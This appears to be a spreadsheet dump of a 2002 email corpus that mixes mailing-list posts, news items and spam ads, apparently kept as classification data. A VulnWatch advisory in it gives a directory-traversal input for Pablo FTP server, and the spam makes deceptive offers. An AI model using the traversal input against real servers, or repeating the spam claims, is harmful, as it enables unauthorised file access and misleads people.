 Rohit Khare - I wish you the best of luck in your search.  I found *my* Very
 Special Lady when I was intentionally looking elsewhere... you never know
 what
 lurks around every corner.  Love certainly has its *own* agenda.
 ---------------------------------------------------------------
 Scanned for viruses by the advanced mail servers at advantageservices.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 300,000 exams to be reviewed
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/215,9,215/
 Date: 2002-10-03T04:20:58+01:00
 *Education:* The scale of this year's A-level crisis is even worse than 
 expected, the inquiry into claims of "grade fixing" has revealed.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 2002-09-12 at 12:22, Dave Long wrote:
 &gt; &lt;http://www.j-bradford-delong.net/movable_type/archives/000393.html&gt;
 &gt; 
 &gt; &gt; ... randomising letters in the middle of words [has] little or no
 &gt; &gt; effect on the ability of skilled readers to understand the text. This
 &gt; &gt; is easy to denmtrasote. In a pubiltacion of New Scnieitst you could
 &gt; &gt; ramdinose all the letetrs, keipeng the first two and last two the same,
 &gt; &gt; and reibadailty would hadrly be aftcfeed. My ansaylis did not come
 &gt; &gt; to much beucase the thoery at the time was for shape and senqeuce
 &gt; &gt; retigcionon.  Saberi's work sugsegts we may have some pofrweul palrlael
 &gt; &gt; prsooscers at work. The resaon for this is suerly that idnetiyfing
 &gt; &gt; coentnt by paarllel prseocsing speeds up regnicoiton. We only need
 &gt; &gt; the first and last two letetrs to spot chganes in meniang.
 I'm working with an experimental text recognition/processing engine that
 exhibits similar characteristics.  It can read right through
 misspellings like the above without any difficulty.  And as the author
 above suggested, the pattern matching is inherently parallel internally.
 If the text recognition algorithm/architecture humans use is anything
 like the algorithm/structure we've been working with, the reason the
 first letter (and to a lesser extent, the last letter) is important is
 that without it the text pattern recognition problem is exponentially
 more difficult (from a theoretical standpoint anyway) and has to be
 resolved using deeper abstraction analysis.  The middle letters are far
 less important and computationally much easier to resolve correctly.  
 Cheers,
 -James Rogers
  jamesr@best.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Woman finds rubber glove in hamburger bun. Will now sue
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8404725,1717/
 Date: 2002-09-30T19:18:23+01:00
 (Some Guy)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [Razor-users] spamassassin+razor2
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Theo,
 Thank you very much, it solves the problem!!!!
 Eugene
 -----Original Message-----
 From: razor-users-admin@example.sourceforge.net
 [mailto:razor-users-admin@lists.sourceforge.net]On Behalf Of Theo Van
 Dinter
 Sent: September 5, 2002 4:38 PM
 To: Eugene Chiu
 Cc: razor-users@example.sourceforge.net
 Subject: Re: [Razor-users] spamassassin+razor2
 On Thu, Sep 05, 2002 at 04:27:08PM -0400, Eugene Chiu wrote:
 &gt; razor2 check skipped: Bad file descriptor Insecure dependency in open
 while runn
 &gt; ing setuid at /usr/local/lib/perl5/site_perl/5.6.1/Razor2/Client/Config.pm
 line
 &gt; 410, &lt;GEN23&gt; line 1.
 &gt; &gt;From info@znion.com  Thu Sep  5 11:55:15 2002
 &gt;  Subject: *****SPAM***** Computer Maintenance
 &gt;   Folder: /home/eugene/caughtspam
 8343
 It looks like you're running via procmail -- what are the permissions
 on procmail?  "Insecure dependency" screams "I'm in taint mode!", which
 is a typical problem when procmail is setuid/setgid (the permissions
 should be 755).
 If this is in fact the problem, an easy solution is to put "DROPPRIVS=yes"
 in the procmailrc. :)
 --
 Randomly Generated Tagline:
 "The bus had no heat, blew over in the wind and used the driver's legs
  as its first line of defense in an accident." - Unknown about the VW Bus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</si>
  <si>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--==_Exmh_1581673767P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Valdis.Kletnieks@vt.edu
 &gt; Date:  Mon, 26 Aug 2002 14:22:46 -0400
 &gt;
 &gt; I'm perfectly willing to can-opener that code and see where the CPU is
 &gt; going, but only if nobody is slapping their forehead and mumbling about
 &gt; a brown-paper-bag bug... ;)
 As I mentioned in my email to Anders, it's certainly in my code and I don't 
 have time to work on it right now, so I would not be offended if you worked on 
 it.
 I just this moment found out that my partner has promised a few things would be 
 done before my vacation that will require my efforts, so it's even more true 
 that it was when I sent the mail to Anders.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_1581673767P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9anXzK9b4h5R0IUIRAqiEAJsEF+hfbYPkHDm0L6E8Q+a7yy/0pACcDZXl
 u6aC2B1PKjc336D56TZvdxc=
 =x6ru
 -----END PGP SIGNATURE-----
 --==_Exmh_1581673767P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Definitely the answer many have been waiting for!!
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Market Internet Access - No Investment Needed 
</t>
  </si>
  <si>
    <t xml:space="preserve">Market Internet Access 
 No Investment Needed 
 Premium Internet Access for only $14.95 per month or less! 
 Earn $1 per Subscriber per month
 Go To:
 http://new.isp.50megs.com/
 3442BvLB9-565fAFx0200Lbck9-698onqh7l33
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A Living Memorial
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 Say 'amen' somebody. What the WSJ said, appended below.
 The WTC, as constructed, was a confiscatory government boondoggle,
 expropriated from the original pre-construction property owners at
 the behest of a third-generation trust-fund-aristocrat for the "good"
 of the city, and owned by an "authority" looking for something else
 to do after it, and its coach-hounds in organized labor and organized
 crime, had killed what was the largest port in the world's richest
 nation.
 Now, of course, it's about to get worse. The sins of 40 years ago
 have been compounded at the hands of two kinds of literally
 irrational fanatics, first those in religion, and now those in
 government.
 As a result, a large part of 10 million square feet of once perfectly
 usable office space, devoted, at least ostensibly, to commerce, will
 be "granted" away  in a potlatch that only government, and
 special-interest "communities", (or "stakeholders", or whatever the
 cryptosocialist psycho-rabble call themselves this week) can organize
 to such perfection.
 All this in probably the *only* city in the country that was founded
 by a *business*, explicitly for the purpose of *commerce*. Not
 religious fanaticism. Not colonial expansion in a monarch's name.
 *Commerce*.
 If they *really* wanted to make a point to the superstitious luddites
 who collapsed those buildings (using probably the only sharp objects
 on a plane full of government-disarmed passengers) the so-called
 "authority" should disband itself and sell its property off to the
 highest bidder and let the *market* -- the cure to all luddism,
 foreign and domestic, government and superstitious -- decide.
 If the new, *private* owner wants to sell, or give away, a space for
 a memorial, fine. They could sell tickets and donate the money to the
 families of the dead and injured. Probably great for marketing the
 property, at least during the lifetime of anyone who remembers the
 event.
 And, of course, if the new owner wants to build something twice as
 tall, or with twice as much space than the original 10 million square
 feet, splendid. Whatever the market will bear.
 In these days of increasingly ubiquitous trans-national geodesic
 internetworks, of strong financial cryptography, and of exponentially
 decreasing transaction costs in formerly monolithic industries,
 economics and freedom can, and will, prevail over both superstition
 and statism.
 It's probably too much to hope for an actual market in lower
 Manhattan mega-real-estate to prevail this early in the game, but
 it's going to happen sooner or later.
 And, whenever it does, *that* will be a fitting memorial to those who
 died at the World Trade Center.
 Cheers,
 RAH
 - -------
 http://online.wsj.com/article_print/0,,SB1031705210159756235,00.html
 The Wall Street Journal
 September 11, 2002
 REVIEW &amp; OUTLOOK
 A Living Memorial
 As we write these words, we can look down from our offices into the
 six-story crater where the Twin Towers once stood. Like everyone
 else, we want that site to be rebuilt in a way that honors those who
 died a year ago. But we also think the best memorial to those who
 perished would be a living one.
 The site of the World Trade Center calls forth many emotions,
 especially today: anger, grief and respect for the many acts of
 heroism that took place there. But underlying it all is the memory of
 the enormous vitality that distinguished the towers before they were
 attacked and was a large reason they were targeted. The best
 expression of the spirit of New York and of those who died would be
 to once again see thousands of people from dozens of countries
 working, meeting, shopping, eating -- that is, engaged in the sort of
 productive work and play that used to take place there. Osama bin
 Laden should not be allowed to have turned it into a cemetery.
 But restoring this memory is not what the discussion in New York has
 been about. So far no one is talking seriously about the vigorous
 rebuilding of downtown Manhattan, which lost 100,000 jobs when the
 Trade Center fell. Instead the discussion centers on the size and
 scale of the memorial, and on satisfying every political interest now
 clamoring for a piece of the action. New York's political leadership,
 and its financial and media elites, are squandering a historic chance
 to rebuild a better, more prosperous city.
 This is in part the fault of the commission tasked with figuring out
 what to do with the site. In consultation with New York Governor
 George Pataki, who is thinking primarily about his own November
 re-election, the commission made the decision to focus first on the
 memorial. The Manhattan Institute's Steve Malanga argues that the
 commission would have been better off setting aside a limited space
 for the memorial, getting on with the rebuilding and then returning
 to the memorial. This is in essence what the Pentagon has so
 successfully done -- rebuild immediately and set aside two acres for
 an outdoor memorial, a design for which has yet to be decided.
 A big part of the problem in New York is that the city's
 anti-development activists know an opening when they see one. They
 want the World Trade Center site -- and even some surrounding areas
 - -- transformed into an enormous park. These political advocates have
 had plenty of practice at turning proposed development projects in
 New York into a nightmare of delay and litigation, and the World
 Trade Center site is now getting the same treatment. Worse, they are
 cynically using some bereaved family members to advance their own
 anti-development agenda in the name of "honoring" the dead. One
 family group even called a press conference to reject as
 disrespectful a proposed train line under the site.
 We are not experts in designing war memorials, but we're confident
 that a gigantic park in the heart of the world's financial center
 isn't the appropriate choice for those who died a year ago. The great
 cities of Europe and Japan, devastated in World War II, have all
 rebuilt, and with memorials that are integrated into modern urban
 life. Perhaps the most powerful is found in Rotterdam, the Dutch port
 city reduced to rubble by German bombing, where survivors erected a
 statue of a man with a hole where his heart used to be.
 In this country, the practice has been for the names of war dead to
 be inscribed on the walls of institutions with which they were
 affiliated. If you walk into Nassau Hall at Princeton University,
 you'll find the names of 644 alumni who died in the Revolutionary
 War, the War of 1812, the Civil War, the Spanish-American War, World
 War I, World War II, Korea and Southeast Asia. No one thinks it
 disrespectful to the dead that the life of the university goes on
 around the walls containing their names.
 In New York now, it would help if political leaders looked beyond the
 emotional tug of the victims and their families to the city's future.
 Rudolph Giuliani, now that he's out office, wants the entire 16 acres
 devoted to the memorial. Governor Pataki has called for no structures
 on the "footprints," which, being in the center of the site, would
 severely curtail options. Mayor Michael Bloomberg initially raised
 his voice in favor of commercial development but was bloodied by the
 press and has since ducked for cover.
 Maybe things will be different after this anniversary is past. Maybe
 those responsible for the World Trade Center site will start thinking
 more about the next 50 or 100 years than the past 12 months. The best
 way to honor the dead is by reviving normal life and commerce.
 -----BEGIN PGP SIGNATURE-----
 Version: PGP 7.5
 iQA/AwUBPX9zD8PxH8jf3ohaEQI2aACgv7mtb5VKTpRj5MJQt1OyzyifzusAn273
 fgNkOntna6+SmLO8TB4XYbC2
 =09az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</si>
  <si>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Re: Digital radio playlists are prohibited?!
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2002-09-25 at 13:34, bitbitch@magnesium.net wrote:
 &gt; 
 &gt; This, kiddies was apparently the legislative beginnings of the whole
 &gt; streaming audio-gets-spanked-by-fees ruling that came down in the
 &gt; earlier parts of this year.  This first act applied to non-exempt,
 &gt; non-subscription transmission services.  When Congress got around in
 &gt; 1998 and realized that webcasting services -might- be different
 &gt; (though I honestly can't see how) they wrote in the provision through
 &gt; the DMCA to include such transmissions.
 The restrictive law regarding audio is actually the accumulated cruft of
 30 years of various legislative acts. The totality of what we have now
 come from various parts of all the following re: sound recordings:
 1998 - DMCA
 1995 - Digital Performance Right in Sound Recordings Act
 1992 - Audio Home Recording Act
 1976 - Copyright Act amendment
 1972 - Copyright Act amendment
 It is worth noting that many people have forgotten about the 1976
 Copyright Act Amendment which created the foundational law stating that
 the copyright owners have the right to limit personal use of audio
 recordings after First Sale even if you are not "making copies" in any
 commercial sense.  Sound recordings, for many intents and purposes, are
 explicitly excluded from Fair Use by the 1976 amendment.
 -James Rogers
  jamesr@best.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Gas Prices To High We can Help 6302ldl6
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00C3_53C41C0D.A0367D12
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 PGh0bWw+PGJvZHk+PHRhYmxlIGJvcmRlcj0iMyIgd2lkdGg9IjgzJSIgaGVp
 Z2h0PSIxODYiIGNlbGxzcGFjaW5nPSI0IiBjZWxscGFkZGluZz0iNCIgYm9y
 ZGVyY29sb3I9IiMwMDAwODAiPg0KICA8dHI+PHRkIHdpZHRoPSIxMDAlIiBo
 ZWlnaHQ9IjEiIGNvbHNwYW49IjIiIGJnY29sb3I9IiNGRkZGMDAiPg0KICAg
 ICAgPHAgYWxpZ249ImNlbnRlciI+PGI+PGZvbnQgc2l6ZT0iNSIgZmFjZT0i
 QXJpYWwgQmxhY2siPjxpbWcgYm9yZGVyPSIwIiBzcmM9Imh0dHA6Ly84MS45
 LjguNDAvaW1hZ2VzL25venpsZS5qcGciIGFsaWduPSJsZWZ0Ij48L2ZvbnQ+
 PC9iPjxwIGFsaWduPSJjZW50ZXIiPiZuYnNwOzxwIGFsaWduPSJjZW50ZXIi
 PjxiPjxmb250IHNpemU9IjUiIGZhY2U9IkFyaWFsIEJsYWNrIj5JbmNyZWFz
 ZQ0KICAgICAgWW91ciBHYXMgTWlsZWFnZTwvZm9udD48Zm9udCBzaXplPSI1
 IiBmYWNlPSJBcmlhbCBCbGFjayI+PGJyPmJ5IHVwIHRvIDI3JQ0KICAgICAg
 ISE8L2ZvbnQ+PC9iPjwvdGQ+PC90cj48dHI+DQogICAgPHRkIHdpZHRoPSI1
 NSUiIGhlaWdodD0iOTkiPjxiPjxmb250IGZhY2U9IkFyaWFsIiBzaXplPSIy
 Ij4qIE5vIFRPT0xTDQogICAgICByZXF1aXJlZCEmbmJzcDs8YnI+KiBJbXBy
 b3ZlcyBQb3dlcjxpbWcgYm9yZGVyPSIwIiBzcmM9Imh0dHA6Ly84MS45Ljgu
 NDAvaW1hZ2VzL2YtMzUwZC5naWYiIGFsaWduPSJyaWdodCIgd2lkdGg9IjEy
 NSIgaGVpZ2h0PSI2NyI+PGJyPiogTWF4aW1pemVzIEVuZXJneTxicj4NCiAg
 ICAgICogSW1wcm92ZXMgTWlsZWFnZSZuYnNwOzxicj4qIEltcHJvdmVzIFRv
 cnF1ZSZuYnNwOzxicj4NCiAgICAgICogQ2xlYW5lciBFbmdpbmUmbmJzcDs8
 YnI+KiBTbW9vdGhlciBFbmdpbmUmbmJzcDs8YnI+DQogICAgICAqIFJlZHVj
 ZXMgRW1pc3Npb25zIGJ5IDQzJSZuYnNwOzxicj4qIFByb3RlY3RzIENhdGFs
 eXRpYyBDb252ZXJ0ZXJzJm5ic3A7PGJyPiogUHJldmVudHMgRGllc2VsIEdl
 bGxpbmcmbmJzcDs8YnI+DQogICAgICAqIEltcHJvdmVzIFNwYXJrIFBsdWcg
 TGlmZSZuYnNwOzxicj4qIE1haW50ZW5hbmNlIEZyZWU8YnI+KiBQYXlzIGZv
 ciBJdHNlbGYgd2l0aGluIDYwIGRheXMhPC9mb250PjwvYj48L3RkPg0KICAg
 IDx0ZCB3aWR0aD0iNDUlIiBoZWlnaHQ9Ijk5Ij48Yj48Zm9udCBmYWNlPSJB
 cmlhbCI+PGZvbnQgc2l6ZT0iNCI+PHU+SW5zdGFsbHMNCiAgICAgIGluIFNl
 Y29uZHMhPC91PjwvZm9udD48YnI+PGZvbnQgc2l6ZT0iMyI+QSBzaW1wbGUg
 ZGV2aWNlIHRoYXQgZWFzaWx5IHNuYXBzIG92ZXIgeW91ciBmdWVsIGxpbmUu
 PC9mb250PiZuYnNwOyBBbnlvbmUgY2FuIGRvIGl0ITxicj4NCiAgICAgIDwv
 Zm9udD48L2I+PHA+PGZvbnQgc2l6ZT0iNCIgZmFjZT0iQXJpYWwiPjxiPjx1
 Pkd1YXJhbnRlZWQ8L3U+PC9iPjwvZm9udD48Zm9udCBmYWNlPSJBcmlhbCI+
 PGI+PGZvbnQgc2l6ZT0iNCI+PHU+ITwvdT48L2ZvbnQ+PGJyPg0KICAgICAg
 PGZvbnQgc2l6ZT0iMyI+RlVMTCBSRUZVTkQgaWYgeW91IGFyZSBub3Qgc2F0
 aXNmaWVkIHdpdGggdGhlIHJlc3VsdCB3aXRoaW4gVEhSRUUgTU9OVEhTIGZy
 b20gdGhlIGRhdGUgb2YgcHVyY2hhc2UuPC9mb250PjwvYj4NCiAgICAgIDwv
 Zm9udD48L3A+PHAgYWxpZ249ImNlbnRlciI+PGZvbnQgZmFjZT0iQXJpYWwi
 IHNpemU9IjMiPjxiPjxhIGhyZWY9Imh0dHA6Ly84MS45LjguNDAvY2dpLWJp
 bi9mdWVsbWF4L2luZGV4LmNnaT81MzAxNCI+Q0xJQ0sNCiAgICAgIEhFUkU8
 L2E+PC9iPjwvZm9udD48L3RkPjwvdHI+PHRyPg0KICAgIDx0ZCB3aWR0aD0i
 MTAwJSIgaGVpZ2h0PSI5OSIgY29sc3Bhbj0iMiI+DQo8cCBhbGlnbj0iY2Vu
 dGVyIj48Zm9udCBzaXplPSIxIj48Zm9udCBmYWNlPSJhcmlhbCwgaGVsdmV0
 aWNhIj5IT1cgVE8NClVOU1VCU0NSSUJFOjxicj4NCllvdSByZWNlaXZlZCB0
 aGlzIGUtbWFpbCBiZWNhdXNlIHlvdSBhcmUgcmVnaXN0ZXJlZCBhdCBvbmUg
 b2Ygb3VyIFdlYiBzaXRlcywgb3INCm9uIG9uZSBvZiBvdXIgcGFydG5lcnMn
 IHNpdGVzLjxicj4NCiZuYnNwO0lmIHlvdSBkbyBub3Qgd2FudCB0byByZWNl
 aXZlIHBhcnRuZXIgZS1tYWlsIG9mZmVycywgb3IgYW55IGVtYWlsDQptYXJr
 ZXRpbmcgZnJvbSB1cyBwbGVhc2UgPC9mb250PjxhIGhyZWY9Imh0dHA6Ly84
 MS45LjguNDAvY2dpLWJpbi9mdWVsbWF4L2luZGV4LmNnaT81MzAxNCNyZW1v
 dmUiIHRhcmdldD0iX2JsYW5rIj5jbGljaw0KaGVyZS48L2E+PC9mb250Pjwv
 cD48L3RkPg0KICA8L3RyPjwvdGFibGU+PC9ib2R5PjwvaHRtbD4NCjxmb250
 IGNvbG9yPSJXaGl0ZSI+DQpCb3kgZnJpZW5kNDk1OVZqZno1LTAyNGt0WVA4
 MTk5bk1zajQtMjc0a3lsMzANCg0KNzczOGFjbWoyLTM4NWVBS3I0Nzg2R3h5
 bzItMjg2bndvWTEwNjZsaklYOC05NzBZWkxoOTc2NWxWbDU0DQo=
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [WM] ADV: Direct email blaster, email addresses extractor, maillist verify, maillist manager...........
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Friend, Get Help With Your Debt Now!!
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Friend,
 ezDebtConsolidationInfo.com
 -----------------------------------------------------------
 Is your debt causing you problems?
       CONSOLIDATE YOUR DEBTS!
 and...
 * Pay one monthly payment that you can afford
 * Reduce interest rates, paying off your debt sooner
 * Avoid the consequences of bankruptcy
 * Answer your phone calls without fear!
 http://click.mm53.com/sp/t.pl?id=3120:7552100
 &lt;a href="http://click.mm53.com/sp/t.pl?id=3121:7552100"&gt;Click Here for A Free Evaluation!&lt;/a&gt;
 or type http://click.mm53.com/sp/t.pl?id=3122:7552100 into your browser.
 ------------------------------------------------------------
 Remove yourself from this recurring list by sending a blank email to
 mailto:unsub-7552100-311@mm53.com
 OR Sending a postal mail to:
 Customer Service
 427-3 Amherst Street, Suite 319
 Nashua, NH 03063
 This message was sent to address cypherpunks@einstein.ssz.com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</si>
  <si>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ADV: Direct email blaster, email addresses extractor, maillist verify, maillist manager...........
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [VulnWatch] Pablo Sofware Solutions FTP server Directory Traversal Vulnerability
</t>
  </si>
  <si>
    <t xml:space="preserve">Pablo Sofware Solutions FTP server Directory Traversal Vulnerability
 .oO  Overview Oo.
 Pablo Software Solutions FTP server version 1.0 build 9 shows files and 
 directories that reside outside the normal FTP root directory. 
 Discovered on 2002, July, 20th
 Vendor: Pablo Software Solutions
 Pablo's FTP Server is a multi threaded FTP server for Windows 98/NT/XP. 
 It comes with an easy to use interface and can be accessed from the system 
 tray.  
 The server handles all basic FTP commands and offers easy user account 
 management and support for virtual directories.
 This FTP server can shows file and directory content that reside outside the 
 normal FTP root directory.
 .oO  Details Oo.
 The vulnerability can be done using the MS-DOS ftp client. When you are 
 logged on the server, you can send a dir \..\, or a dir \..\WINNT, supposed 
 your root directory is c:\ftp_server 
 .oO  Solution Oo.
 The vendor has been informed and has solved the problem.
 Download Pablo's FTP Server Build 10 at : 
 http://www.pablovandermeer.nl/ftp_server.html
 .oO  Discovered by Oo.
 Arnaud Jacques
 webmaster@securiteinfo.com
 http://www.securiteinfo.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The boy for Brazil?
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8597656,215/
 Date: 2002-10-06T02:27:59+01:00
 *The Observer Profile: *Brazil goes to the polls today, and all the indications 
 are that its 110 million voters will elect a man who once sold peanuts on the 
 street: *Luis 'Lula' da Silva*.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Maintenance Tracking/Scheduling Software, $1495
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ------=_BkymKzPF_EOQL8qx8_MR
 Content-Type: text/html
 Content-Transfer-Encoding: 8bit
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META content="text/html; charset=iso-8859-1" http-equiv=Content-Type&gt;
 &lt;META content="MSHTML 5.00.3315.2870" name=GENERATOR&gt;
 &lt;title&gt;Maintenance Tracking/Scheduling Software, $1495&lt;/title&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=#ffffff link=blue vlink=blue&gt;
 &lt;FONT face=Arial&gt;
 &lt;TABLE border=0 width="95%" cellPadding=0 cellSpacing=0&gt;
   &lt;TBODY&gt;
    &lt;TR&gt;
      &lt;TD vAlign=top&gt;
       &lt;IMG border=0 src="cid:ezm.jpg"&gt;&lt;/TD&gt;
     &lt;TD&gt;&lt;FONT color=red size=6&gt;Complete Maintenance Scheduling and Tracking Software for any equipment or vehicle, $1,495.00&lt;/FONT&gt;&lt;/TD&gt;
   &lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD colSpan=2 vAlign=top&gt;
       &lt;FONT size=5 color=red&gt;&lt;B&gt;Order by July 31st and receive two additional user licenses at no charge--a $300.00 value!&lt;/b&gt;&lt;/font&gt;
       &lt;BR&gt;
       &lt;P&gt;&lt;FONT size=4&gt;&lt;B&gt;&lt;font color=red&gt;EZ Maintenance&lt;/font&gt;&lt;/B&gt; is a complete software package designed to schedule, manage and track all maintenance and repairs on any type of equipment and all vehicles, including tires!
       &lt;p&gt;&lt;font color=red&gt;EZ Maintenance&lt;/font&gt; is Network/Multi user ready out of the box. In addition to scheduling, tracking, keeping histories of and producing work orders for all maintenance on equipment or vehicles,  EZ Maintenance also tracks costs, hours, and downtime for repairs.  It includes over 80 reports and has available a link to Excel for the creation of specialized reports.  Along with many other features, EZ Maintenance produces maintenance calendars and complete maintenance histories.  Equipment to be maintained can be bar coded, allowing a maintenance procedure to begin with a simple reading of the bar code.  On the vehicle side, EZ Maintenance also tracks both vehicle and driver license information and license expiration dates and produces a report showing all expiring licenses 30 days in advance.  It records all driver information, and allows for entry and tracking of all driver incidents
       &lt;u&gt;EZ Maintenance is everything you need to maintain equipment or vehicles in one complete software package.&lt;/u&gt;
       &lt;p&gt;For more information, please call (661) 286-0041 or email &lt;a href="mailto:info@linkitsoftware.com"&gt;info@linkitsoftware.com&lt;/a&gt;&lt;/font&gt;
       &lt;font size=3&gt;&lt;P&gt;To be removed from this mailing list 
       please place the word "remove" in the subject line &lt;A 
       href="mailto:remove@linkitsoftware.com"&gt;remove@linkitsoftware.com&lt;/A&gt;&lt;/P&gt;
       &lt;/TD&gt;
    &lt;/TR&gt;
 &lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;/FONT&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ------=_BkymKzPF_EOQL8qx8_MR
 Content-Type: image/jpeg; name="ezm.jpg"
 Content-Transfer-Encoding: base64
 Content-ID: &lt;ezm.jpg&gt;
 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
